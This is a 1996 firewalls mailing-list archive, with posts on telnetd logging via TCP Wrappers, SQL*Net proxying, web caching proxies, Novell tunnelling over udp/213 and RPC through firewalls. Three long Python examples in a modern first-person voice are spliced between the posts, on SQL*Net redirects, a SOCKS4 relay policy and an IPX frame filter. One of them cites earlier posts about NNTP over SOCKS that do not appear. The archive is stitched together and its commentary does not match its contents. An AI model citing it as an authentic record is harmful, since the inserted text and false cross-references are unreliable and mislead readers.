Ken > >Karen Goertzel >Manager, International Programmes and Special Projects >Secure Systems and Services Operation >Wang Federal, Inc. >7900 Westpark Drive - MS 700 >McLean, Virginia 22102-4299 >TEL: 703-827 3914 >FAX: 703-827 3161 >goertzek@wangfed.com >http://www.wangfed.com > [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Tue Feb 6 08:08:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19284 for firewalls-outgoing; Tue, 6 Feb 1996 07:53:02 -0800 (PST) Received: from mail.pi.se (mail.pi.se [194.52.20.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19268 for ; Tue, 6 Feb 1996 07:52:56 -0800 (PST) Received: from z (docutech.telegate.se [194.142.26.28]) by mail.pi.se (8.6.10/8.6.9) with SMTP id QAA17949; Tue, 6 Feb 1996 16:50:56 +0100 Message-Id: <199602061550.QAA17949@mail.pi.se> X-Sender: s2833@mail.pi.se X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 06 Feb 1996 16:49:18 -10000 To: Sick Puppy , firewalls@GreatCircle.COM From: Matts Kallioniemi Subject: Re: Need a few pointers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 17.41 1996-02-05 -0500, Sick Puppy wrote: >There was a very good response to my query. I had no idea there were >so many security problems and performance problems associated with >WindBlows 95. 
Sounds like the operating system was written by a couple >of drunken cats. In a couple of days I will get the responses together >in one file, together with a couple of good web pointers, and pass it on >to anyone who wants an e-mailed copy. I want one, please! Why don't you post it to the list? matts From firewalls-owner Tue Feb 6 08:23:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19221 for firewalls-outgoing; Tue, 6 Feb 1996 07:49:53 -0800 (PST) Received: from sonyinet.sony.co.jp (sonyinet.sony.co.jp [202.238.80.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19211 for ; Tue, 6 Feb 1996 07:49:47 -0800 (PST) Received: from sonygw.sony.co.jp ([43.0.1.249]) by sonyinet.sony.co.jp (8.6.10/3.3Wb-96011708) with SMTP id AAA09561 for ; Wed, 7 Feb 1996 00:48:56 +0900 Received: from sabakon.adv.sbc.sony.co.jp ([43.194.41.150]) by sonygw.sony.co.jp (4.0/6.4J.6) id AA06508; Wed, 7 Feb 96 00:48:36 JST Received: from barolo.adv.sbc.sony.co.jp by sabakon.adv.sbc.sony.co.jp (4.1/6.4J.6-sbc) id AA05482; Tue, 6 Feb 96 15:48:35 GMT From: md@adv.sbc.sony.co.jp (Mark Dudley) Date: Tue, 6 Feb 96 15:46:38 GMT Received: from rioja.adv.sbc.sony.co.jp by barolo.adv.sbc.sony.co.jp (4.0/6.4J.6-sbc) id AA17730; Tue, 6 Feb 96 15:46:38 GMT Message-Id: <9602061546.AA17730@barolo.adv.sbc.sony.co.jp> To: firewalls@greatcircle.com Subject: planet gateway firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I want to set up a connection to the Internet via an ISDN line and use a firewall. Planet Gateway offer a package to do this including their own firewall. Has anyone had any experience of their firewall product? If so, any comments? 
Mark Dudley From firewalls-owner Tue Feb 6 08:38:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA20924 for firewalls-outgoing; Tue, 6 Feb 1996 08:32:11 -0800 (PST) Received: from bayflash.stpt.usf.edu (bayflash.stpt.usf.edu [131.247.140.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20912 for ; Tue, 6 Feb 1996 08:32:02 -0800 (PST) Received: (johnson@localhost) by bayflash.stpt.usf.edu (8.6.11/8.6.5) id LAA13256; Tue, 6 Feb 1996 11:27:42 -0500 Date: Tue, 6 Feb 1996 11:27:41 -0500 (EST) From: Steven Johnson - Hukd on Fonix X-Sender: johnson@bayflash To: Prakash N Purushotham cc: "'firewalls@greatcircle.com'" Subject: Re: telnetd In-Reply-To: <31180839@gangotri.mindware.soft.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Prakash N Purushotham wrote: > Is there any way I can configure telnetd to log the client's > IP Address, the login id used, time stamps in syslog? Use TCP Wrappers, you can configure which protocols you want added to an event log. We currently monitor telnet, finger, ftp, and rsh, to name a few. 
____ ___ ________ ________ /_ _) /_ ) / ______)/ ______)_/| / _/ / / / (____ / /___ _/ | Email: johnson@stpt.usf.edu / _/ / / \____ ) / _____) _/ | / _/___/ / ______/ / / / _/ | WWW: http://www.stpt.usf.edu/~johnson (_________)(________)(___)______/ | From firewalls-owner Tue Feb 6 09:03:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19588 for firewalls-outgoing; Tue, 6 Feb 1996 07:59:51 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19581 for ; Tue, 6 Feb 1996 07:59:44 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 10:59:09 EST Received: from relay3.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 13:51:09 EST Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQaaql23355; Mon, 29 Jan 1996 13:47:31 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA07596 for firewalls-outgoing; Mon, 29 Jan 1996 09:53:17 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA07591 for ; Mon, 29 Jan 1996 09:53:13 -0800 (PST) Received: from waller.bwh.harvard.edu (waller.bwh.harvard.edu [134.174.81.249]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id MAA09560; Mon, 29 Jan 1996 12:52:09 -0500 From: Adam Shostack Received: by waller.bwh.harvard.edu (8.6.9) id MAA02600; Mon, 29 Jan 1996 12:51:49 -0500 Message-ID: <199601291751.MAA02600@waller.bwh.harvard.edu> Subject: Re: router performance To: bwalker@musings.com (Brad Walker) Date: Mon, 29 Jan 1996 12:51:49 -0500 (EST) CC: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: | I believe at one time there was some work being done at Harvard Univ. | about testing router performance. 
| | Can someone please point me to this or another site that is doing | router performance testing.. Harvard has a network device test lab, ftp or http ndtl.harvard.edu/ndtl Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume 
From firewalls-owner Tue Feb 6 09:53:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA23487 for firewalls-outgoing; Tue, 6 Feb 1996 09:41:30 -0800 (PST) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA23470; Tue, 6 Feb 1996 09:41:17 -0800 (PST) Message-Id: <199602061741.JAA23470@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA042058427; Tue, 6 Feb 1996 12:40:27 -0500 Date: Tue, 6 Feb 1996 12:40:27 -0500 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: SQL*Net proxy? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone successfully configured a proxy for outbound/inbound SQL*Net > transactions? > > In my observations, Unix to Unix server communications take place on a > designated port, but PC to Unix communications switch port numbers after > about 20-25 packets. > > The PC always sends to the designated port, but the Unix server changes > to a different port. This makes filtering difficult. > Oracle servers that are configured as multithreaded will use dynamic ports. Several firewall vendors are working with Oracle to develop a SQLnet proxy. I don't know the timeframe. 
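The port switch described above is the listener handing the client to a dispatcher, and a SQL*Net-aware proxy has to read that handoff to know which pinhole to open. Here is an added example of mine (not code from the post, from Oracle, or from any firewall vendor) that decodes a REDIRECT packet and shows why a static "allow 1521" rule stops working at that point. It assumes the 8-byte TNS packet header (length, packet checksum, type, reserved, header checksum, all big-endian) with REDIRECT as type 5 carrying a 2-byte length and a connect descriptor, and ACCEPT as type 2; the packet bytes, host name, dispatcher port and client address are constructed.

```python
"""Added example: the listener redirect that makes SQL*Net awkward to
filter, and the pinhole a SQL*Net-aware proxy would open in response.
Illustration only; not code from the post, Oracle or any firewall product.

Assumptions: 8-byte TNS header (packet length, packet checksum, type,
reserved, header checksum; big-endian), REDIRECT type 5 carrying a 2-byte
data length plus a connect descriptor, ACCEPT type 2. All hosts, ports and
packet bytes below are constructed.
"""
import re
import struct

TNS_HEADER = struct.Struct("!HHBBH")
TNS_ACCEPT = 2
TNS_REDIRECT = 5


def tns_type(packet):
    """Packet type byte from the TNS header."""
    _length, _checksum, ptype, _reserved, _hdr_checksum = TNS_HEADER.unpack(packet[:8])
    return ptype


def redirect_target(packet):
    """(host, port) named by a REDIRECT packet; None for any other packet type."""
    if tns_type(packet) != TNS_REDIRECT:
        return None
    (data_len,) = struct.unpack("!H", packet[8:10])
    descriptor = packet[10:10 + data_len].decode("ascii")
    host = re.search(r"\(HOST=([^)]+)\)", descriptor)
    port = re.search(r"\(PORT=(\d+)\)", descriptor)
    if not (host and port):
        raise ValueError("REDIRECT without HOST/PORT: " + descriptor)
    return host.group(1), int(port.group(1))


def build_redirect(host, port):
    """Constructed REDIRECT packet: the listener hands the client to a dispatcher."""
    data = f"(ADDRESS=(PROTOCOL=tcp)(HOST={host})(PORT={port}))".encode("ascii")
    body = struct.pack("!H", len(data)) + data
    return TNS_HEADER.pack(8 + len(body), 0, TNS_REDIRECT, 0, 0) + body


def build_accept():
    """Constructed ACCEPT packet: the dedicated-server case, no port change."""
    return TNS_HEADER.pack(8, 0, TNS_ACCEPT, 0, 0)


class Filter:
    """Static destination-port rules plus per-connection pinholes a proxy adds."""

    def __init__(self, static_ports):
        self.static_ports = set(static_ports)
        self.pinholes = set()

    def allows(self, client, server, port):
        return port in self.static_ports or (client, server, port) in self.pinholes

    def saw_server_reply(self, client, server, packet):
        """Proxy hook on server-to-client traffic: open a pinhole to the dispatcher."""
        target = redirect_target(packet)
        if target is not None:
            self.pinholes.add((client, *target))
        return target


def demo():
    pc, listener = "10.9.8.7", ("unixdb", 1521)
    static = Filter(static_ports={1521})       # the rule the post describes
    proxied = Filter(static_ports={1521})      # same rule, but fed by a proxy
    reply = build_redirect("unixdb", 34567)    # constructed dispatcher port
    host, port = redirect_target(reply)
    proxied.saw_server_reply(pc, listener[0], reply)
    return {
        "connect to listener": static.allows(pc, *listener),
        "dispatcher, static filter": static.allows(pc, host, port),
        "dispatcher, proxy pinhole": proxied.allows(pc, host, port),
    }


if __name__ == "__main__":
    for step, verdict in demo().items():
        print(f"{step}: {'pass' if verdict else 'DROP'}")
```

The first two results are exactly what the original poster saw: the connection to 1521 passes, the follow-on connection to the dispatcher is dropped by a packet filter that never read the redirect.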
From firewalls-owner Tue Feb 6 10:12:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24566 for firewalls-outgoing; Tue, 6 Feb 1996 10:04:23 -0800 (PST) Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24560 for ; Tue, 6 Feb 1996 10:04:19 -0800 (PST) Received: from ryan (ryan.pcslink.com [206.43.161.41]) by pcslink.com (8.6.12/8.6.12) with SMTP id LAA15513 for ; Tue, 6 Feb 1996 11:03:27 -0700 Message-ID: <31179737.5344@pcslink.com> Date: Tue, 06 Feb 1996 11:00:23 -0700 From: Ryan Mooney X-Mailer: Mozilla 2.0b6a (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: WWW Proxy Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > to add one more, for the firewalls 'inside' address> Does such a proxy > > exist for WWW so that: > > 1. Users can use which-ever browers they like. > > 2. The 'standard' winsock.dll, such as provided by FTP with their > > Onnet product, can still be used. > > CERN's httpd > and run it in caching-proxy mode. I set it up to listen to a port, and > simply point all http, ftp, and gopher requests at that port. Note that > > If so, which comercial firewalls support this? > I have this in place with TIS' fwtk. I simply don't use the http-gw that > came with the fwtk, and use CERN's instead. I used CERN for a company I worked for quite a while ago but have heard that Harvest Cache is a LOT faster (and the CERN daemon is quite slow). I socksified the CERN daemon (I imagine it could fairly easily be done for the Harvest daemon also) so that I wouldn't have this huge process running on my firewall (which is generally IMNSHO a bad idea - this is the same reason we don't run sendmail on firewall machines without a wrapper). 
Simple Diagram (I love diagrams) client----Socksified Cern/Harvest-----Application layer firewall(socks)----world Just my $0.000002 From firewalls-owner Tue Feb 6 10:24:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24896 for firewalls-outgoing; Tue, 6 Feb 1996 10:13:23 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24864 for ; Tue, 6 Feb 1996 10:13:06 -0800 (PST) Received: from emperor.sje.MENTORG.COM by newsgw.mentorg.com (8.6.4/CF5.22R) id KAA02869; Tue, 6 Feb 1996 10:10:31 -0800 Received: from sjsys5 by emperor.sje.MENTORG.COM (8.6.8.1/CF5.24R) id KAA12762; Tue, 6 Feb 1996 10:10:40 -0800 From: joe_woolf@MENTORG.COM (Joe Woolf) Received: by sjsys5 (4.1/CF5.24L) id AA21330; Tue, 6 Feb 96 10:13:29 PST Date: Tue, 6 Feb 96 10:13:29 PST Message-Id: <9602061813.AA21330@sjsys5> To: prakashp@mindware.soft.net, ali@protosoft.com Subject: Re: telnetd Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mohammed, Yes. That seems to be the easiest solution. Joe Woolf Network Support Mentor Graphics, San Jose Phone: 451-5844 ** From firewalls-owner@GreatCircle.COM Tue Feb 6 08:05:47 1996 ** Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST) ** From: Mohammed Ali ** To: Prakash N Purushotham ** Cc: "'firewalls@greatcircle.com'" ** Subject: Re: telnetd ** Mime-Version: 1.0 ** Content-Type: TEXT/PLAIN; charset=US-ASCII ** Sender: firewalls-owner@GreatCircle.COM ** Precedence: bulk ** ** On Tue, 6 Feb 1996, Prakash N Purushotham wrote: ** ** > ** > Is there any way I can configure telnetd to log the client's ** > IP Address, the login id used, time stamps in syslog? ** > ** ** How about using TCP Wrappers ! ** ** Mohammed Ali. 
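Two posts above ask about SOCKS: the question of tunnelling NNTP through SOCKS without "opening 10k new holes", and the socksified CERN/Harvest proxy sitting behind a SOCKS firewall. What keeps either arrangement safe is the relay's destination policy, so here is an added example of mine (not code from the posts, from NEC's sockd or from CERN httpd) of one SOCKS4 CONNECT exchange with a policy check on the server side. It assumes the SOCKS4 wire format (request: VN=4, CD=1, 2-byte port, 4-byte IPv4 address, user id, NUL; reply: VN=0, CD=90 granted or 91 rejected, port, address). The addresses, user name and policy table are constructed; the inside network is 10.1.0.0/16 and 10.1.3.10 plays the socksified caching proxy.

```python
"""Added example: a SOCKS4 CONNECT exchange for NNTP and the destination
policy that keeps the relay from becoming a general-purpose hole. My
illustration, not code from the list posts, sockd or CERN httpd.

Assumptions: SOCKS4 request VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL;
reply VN=0, CD=90 (granted) or 91 (rejected), DSTPORT, DSTIP. Addresses,
user id and policy below are constructed.
"""
import ipaddress
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 90
REPLY_REJECTED = 91
SOCKS4_FIXED = struct.Struct("!BBH4s")      # VN, CD, DSTPORT, DSTIP (8 bytes)


def build_request(dst_ip, dst_port, userid):
    """Client -> sockd: CONNECT to dst_ip:dst_port, user id NUL-terminated."""
    return (SOCKS4_FIXED.pack(SOCKS_VERSION, CMD_CONNECT, dst_port, socket.inet_aton(dst_ip))
            + userid.encode("ascii") + b"\x00")


def parse_request(data):
    """Decode a CONNECT request; raises ValueError on anything malformed."""
    if len(data) < 9:
        raise ValueError("short request")
    vn, cd, port, raw_ip = SOCKS4_FIXED.unpack(data[:8])
    if vn != SOCKS_VERSION or cd != CMD_CONNECT:
        raise ValueError("not a SOCKS4 CONNECT")
    userid, sep, _rest = data[8:].partition(b"\x00")
    if not sep:
        raise ValueError("user id not NUL-terminated")
    return socket.inet_ntoa(raw_ip), port, userid.decode("ascii")


def build_reply(granted, dst_ip="0.0.0.0", dst_port=0):
    """sockd -> client: VN is 0 in replies; CD 90 = granted, 91 = rejected."""
    code = REPLY_GRANTED if granted else REPLY_REJECTED
    return SOCKS4_FIXED.pack(0, code, dst_port, socket.inet_aton(dst_ip))


def reply_granted(data):
    vn, cd, _port, _ip = SOCKS4_FIXED.unpack(data[:8])
    return vn == 0 and cd == REPLY_GRANTED


# Constructed policy: (source network, destination port) the relay will serve.
# Inside hosts get NNTP only; the socksified caching proxy also gets web/ftp/gopher.
POLICY = [
    ("10.1.0.0/16", 119),
    ("10.1.3.10/32", 80),
    ("10.1.3.10/32", 21),
    ("10.1.3.10/32", 70),
]


def permitted(src_ip, dst_port):
    src = ipaddress.ip_address(src_ip)
    return any(src in ipaddress.ip_network(net) and dst_port == port for net, port in POLICY)


def sockd_handle(src_ip, request):
    """Relay side: decode, apply the policy, answer. Malformed input is rejected."""
    try:
        dst_ip, dst_port, _userid = parse_request(request)
    except ValueError:
        return build_reply(False)
    return build_reply(permitted(src_ip, dst_port), dst_ip, dst_port)


def client_connect(src_ip, dst_ip, dst_port, userid="smithj"):
    """Client side: send the request, interpret the reply; True when granted."""
    return reply_granted(sockd_handle(src_ip, build_request(dst_ip, dst_port, userid)))


if __name__ == "__main__":
    print("news from a desktop:", client_connect("10.1.5.20", "192.0.2.7", 119))
    print("telnet from a desktop:", client_connect("10.1.5.20", "192.0.2.7", 23))
    print("web from the proxy host:", client_connect("10.1.3.10", "192.0.2.8", 80))
```

The user id field is sent by the client and is not authenticated (SOCKS4 can only cross-check it against identd), so the policy keys on the source address and destination port, never on the name the client claims.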
From firewalls-owner Tue Feb 6 10:38:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24830 for firewalls-outgoing; Tue, 6 Feb 1996 10:12:40 -0800 (PST) Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24825 for ; Tue, 6 Feb 1996 10:12:37 -0800 (PST) Received: from ryan (ryan.pcslink.com [206.43.161.41]) by pcslink.com (8.6.12/8.6.12) with SMTP id LAA15564 for ; Tue, 6 Feb 1996 11:11:47 -0700 Message-ID: <3117992D.3D89@pcslink.com> Date: Tue, 06 Feb 1996 11:08:45 -0700 From: Ryan Mooney X-Mailer: Mozilla 2.0b6a (WinNT; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Novell inside IP Port? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to the Novell docs that I have read, NetWare IP, IP relay and IP tunnel all run on 213/udp (Yuck - udp). Basically I would filter anything from/to that port. Also you could put all the Novell machines on their own subnet with a router (Oh say something like karlbridge) in between and JUST allow IPX across that wall. That is a lot better IMNSHO than just filtering what Novell tells you they use (OK so I don't believe everything I read ;) If security is a real issue I would also have a policy that denies inbound anything except to pre-approved machines that have well known and well controlled services. Of course that's just firewalls 101 and you probably knew that already.... > Is there known TCP/UDP port(s) that support the > tunneling of Novell inside IP? Someone recently set up > such a tunnel and exposed all our Novell Servers to the > Internet. I would like to prevent this from happening > in the future. 
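To make the "only IPX across that wall" suggestion concrete, here is an added example of mine (not code from the post, from Novell or from any router) of the decision a filter at that boundary would make per Ethernet frame: IP is dropped (with the udp/213 NetWare/IP tunnel the post names called out explicitly), IPX routing and service advertisements are dropped, and NCP is passed only to the server nodes on an approved list, which is the least-privilege step beyond "just allow IPX". It assumes Ethernet II framing with ethertype 0x8137 for IPX and 0x0800 for IP, the 30-byte IPX header (checksum, length, transport control, packet type, destination network/node/socket, source network/node/socket), and the well-known IPX sockets 0x0451 NCP, 0x0452 SAP, 0x0453 RIP; every frame, address and node number below is constructed.

```python
"""Added example: a minimal frame filter for the 'only IPX across that
wall' arrangement. My illustration, not code from the post or any vendor.

Assumptions: Ethernet II ethertypes 0x8137 (IPX) and 0x0800 (IP); the
30-byte IPX header; well-known IPX sockets 0x0451 NCP, 0x0452 SAP,
0x0453 RIP; udp/213 as the NetWare/IP port the post quotes. All frames,
MACs, networks and node addresses here are constructed.
"""
import struct

ETHERTYPE_IP = 0x0800
ETHERTYPE_IPX = 0x8137
IPX_HDR = struct.Struct("!HHBB4s6sH4s6sH")        # 30-byte IPX header
SOCKET_NCP, SOCKET_SAP, SOCKET_RIP = 0x0451, 0x0452, 0x0453
UDP_NETWARE_IP = 213


def parse_ipx(payload):
    """Fields of an IPX header; network/node values returned as hex strings."""
    (_cksum, _length, hops, ptype, dnet, dnode, dsock,
     snet, snode, ssock) = IPX_HDR.unpack(payload[:IPX_HDR.size])
    return {"hops": hops, "type": ptype,
            "dst_net": dnet.hex(), "dst_node": dnode.hex(), "dst_sock": dsock,
            "src_net": snet.hex(), "src_node": snode.hex(), "src_sock": ssock}


def udp_ports(ip_payload):
    """(sport, dport) of an IPv4/UDP datagram, else None."""
    ihl = (ip_payload[0] & 0x0F) * 4
    if ip_payload[9] != 17:                        # protocol field: 17 = UDP
        return None
    return struct.unpack("!HH", ip_payload[ihl:ihl + 4])


def wall_decision(frame, ncp_servers):
    """Verdict for one Ethernet II frame crossing the Novell/IP boundary."""
    (ethertype,) = struct.unpack("!H", frame[12:14])
    payload = frame[14:]
    if ethertype == ETHERTYPE_IP:
        ports = udp_ports(payload)
        if ports and UDP_NETWARE_IP in ports:
            return "drop: NetWare/IP tunnel (udp/213)"
        return "drop: IP does not cross the Novell wall"
    if ethertype != ETHERTYPE_IPX:
        return "drop: frame type %#06x" % ethertype
    ipx = parse_ipx(payload)
    if ipx["dst_sock"] in (SOCKET_RIP, SOCKET_SAP):
        return "drop: IPX routing/service advertisement"
    if ipx["dst_sock"] == SOCKET_NCP and ipx["dst_node"] in ncp_servers:
        return "pass: NCP to an approved server"
    return "drop: IPX socket %#06x" % ipx["dst_sock"]


# --- constructed frames used to exercise the filter ---------------------------
def ether(ethertype, payload):
    dst, src = bytes.fromhex("00001b112233"), bytes.fromhex("00001b445566")
    return dst + src + struct.pack("!H", ethertype) + payload


def ipx_frame(dst_net, dst_node, dst_sock, src_net, src_node, src_sock, data=b""):
    hdr = IPX_HDR.pack(0xFFFF, IPX_HDR.size + len(data), 0, 0x11,   # 0x11 = NCP packet type
                       dst_net, dst_node, dst_sock, src_net, src_node, src_sock)
    return ether(ETHERTYPE_IPX, hdr + data)


def udp_frame(src_ip, dst_ip, sport, dport, data=b""):
    udp = struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(src_ip), bytes(dst_ip)) + udp
    return ether(ETHERTYPE_IP, ip)


FEED_SERVER = bytes.fromhex("00001b000001")       # constructed node addresses
WORKSTATION = bytes.fromhex("00001b000002")
NET_A, NET_B = bytes.fromhex("00000010"), bytes.fromhex("00000020")


def demo():
    frames = {
        "ncp to feed server": ipx_frame(NET_A, FEED_SERVER, SOCKET_NCP, NET_B, WORKSTATION, 0x4001),
        "ncp to other node": ipx_frame(NET_A, WORKSTATION, SOCKET_NCP, NET_B, FEED_SERVER, 0x4001),
        "sap broadcast": ipx_frame(NET_A, b"\xff" * 6, SOCKET_SAP, NET_B, FEED_SERVER, SOCKET_SAP),
        "netware/ip udp 213": udp_frame([10, 1, 0, 5], [10, 2, 0, 9], 4000, UDP_NETWARE_IP),
        "dns over ip": udp_frame([10, 1, 0, 5], [10, 2, 0, 9], 4000, 53),
    }
    return {name: wall_decision(frame, {FEED_SERVER.hex()}) for name, frame in frames.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:22s} {verdict}")
```

Dropping SAP at the wall also stops the inside servers from advertising themselves to the other side, which is usually what an administrator in the original poster's position wants.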
From firewalls-owner Tue Feb 6 11:00:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA24132 for firewalls-outgoing; Tue, 6 Feb 1996 09:56:26 -0800 (PST) Received: from uu9.psi.com (uu9.psi.com [38.145.107.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA24127 for ; Tue, 6 Feb 1996 09:56:21 -0800 (PST) Received: from infosys.inf.COM by uu9.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; id AA08985 for firewalls@GreatCircle.COM; Tue, 6 Feb 96 12:55:10 -0500 Received: by Inf.COM (4.1/SMI-4.1) id AA06155; Tue, 6 Feb 96 12:52:22 EST Received: from unknown(204.4.59.106) by infosys.inf.COM via smap (V1.3) id sma006142; Tue Feb 6 12:52:17 1996 Received: from cc:Mail by smtp_gw.inf.com id AA823601570; 06 Feb 95 10:34:29 EST Date: 06 Feb 95 10:34:29 EST From: "SATEESHB" Message-Id: <9601068236.AA823601570@smtp_gw.inf.com> To: firewalls@GreatCircle.COM, "Richard Giering Jr." Subject: Re: RPC Across a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1. RPC runs on TCP also. 3. Why is RPC insecure? Any discussion on this topic would be of help to us. sateesh. ______________________________ Reply Separator _________________________________ Subject: RPC Across a firewall? Author: "Richard Giering Jr." at SMTP_GW Date: 2/5/96 5:58 PM I know the kind of reaction I'm liable to get but I said I'd check into it.... We have developers who are writing apps based upon RPC and demanding that RPC be opened on the firewall. The idea is to enable users with their own Internet provider to be able to access Internal applications using RPC/client-server apps. I have some concerns listed below. Can anyone think of any more? 1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms 2) RPC and portmapper are hard if not impossible to proxy. 3) RPC is insecure 4) portmapper has many known security holes. 
My reaction has been "if they want to dialup, we'll setup internal modems" Is anyone aware of firewall products that allow and protect RPC? Rick Giering, Firewall Ranger CCH Inc. From firewalls-owner Tue Feb 6 11:09:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25921 for firewalls-outgoing; Tue, 6 Feb 1996 10:35:00 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25916 for ; Tue, 6 Feb 1996 10:34:54 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 13:34:14 EST Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 19:50:41 EST Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQaarj24144; Mon, 29 Jan 1996 19:46:18 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA23905 for firewalls-outgoing; Mon, 29 Jan 1996 13:48:36 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA23900 for ; Mon, 29 Jan 1996 13:48:32 -0800 (PST) Received: from East.Sun.COM by mercury.Sun.COM (Sun.COM) id NAA02134; Mon, 29 Jan 1996 13:47:28 -0800 Received: from congress.East.Sun.COM by East.Sun.COM (5.x/SMI-5.3) id AA18018; Mon, 29 Jan 1996 16:47:21 -0500 Received: from traveller.East.Sun.COM by congress.East.Sun.COM (4.1/SMI-4.1) id AA29802; Mon, 29 Jan 96 16:47:09 EST Received: by traveller.East.Sun.COM (SMI-8.6/SMI-SVR4) id QAA06214; Mon, 29 Jan 1996 16:47:11 -0500 Date: Mon, 29 Jan 1996 16:47:11 -0500 From: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group) Message-ID: <199601292147.QAA06214@traveller.East.Sun.COM> To: Firewalls@GreatCircle.COM Subject: Most Secure Unix? 
